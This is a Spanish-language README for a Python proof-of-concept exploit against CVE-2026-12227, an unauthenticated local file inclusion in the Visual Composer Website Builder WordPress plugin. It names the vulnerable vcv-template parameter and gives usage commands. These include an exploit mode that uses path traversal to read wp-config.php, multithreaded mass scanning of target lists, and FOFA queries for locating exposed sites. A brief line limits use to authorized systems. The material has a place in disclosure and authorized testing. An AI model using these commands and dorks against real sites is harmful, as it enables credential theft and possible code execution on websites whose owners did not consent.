CVE-2026-12227 — LFI no autenticado en Visual Composer Website Builder
PoC en Python 3 para CVE-2026-12227 (Wordfence): Inclusión Local de Archivos a través del parámetro de consulta vcv-template en Visual Composer Website Builder (visualcomposer en wordpress.org).
| |
|---|
| Plataforma | Plugin de WordPress |
| Componente | Visual Composer Website Builder |
| Afectado | ≤ 45.16.0 |
| Corregido en | > 45.16.0 (WP Trac 3619572) — usar la última versión estable (p. ej. 45.16.3+) |
| CVSS | 9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Autenticación | No autenticado |
| CWE | CWE-98 |
| No | WPBakery (js_composer) ni SAP NetWeaver Visual Composer |
Resumen
En las versiones vulnerables, las cargas de páginas públicas respetan el parámetro vcv-template controlado por el atacante (junto con vcv-template-type) durante el manejo de template_include de WordPress dentro de PageTemplatesController. Esto puede incluir archivos elegidos por el atacante en el disco; los archivos PHP pueden ejecutarse (RCE). Wordfence señala cadenas con extensiones "seguras" subidas en algunas configuraciones.
Superficie de ataque
- Requiere el plugin instalado y una página de front-end construida con VC (permalink normal).
- La sonda añade parámetros de consulta, p. ej.
?vcv-template-type=vc&vcv-template=blank o rutas LFI bajo vcv-template.
- Parámetros relacionados:
vcv-template-type, vcv-template-stretched.
Requisitos
pip install -r requirements.txt
Python 3.8+.
Uso
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check
# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /
# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet
# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php
# JSON for scripting
python poc.py -u https://target.example --mode check --json
Salida
| Archivo | Significado |
|---|
cve_2026_12227_results.jsonl | JSON completo por objetivo |
Valores de estado
Indicaciones para FOFA
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"
Notas técnicas
- Ruta del código:
visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
- Check trata el control del parámetro o los marcadores LFI como
exploitable_candidate; confirmar en un clon de staging antes de asumir RCE.
- Los addons premium TemplateFilter / theme-builder pueden ampliar las rutas alcanzables en algunos sitios.
Legal
Usar solo en sistemas que posea o para los que tenga permiso explícito de prueba.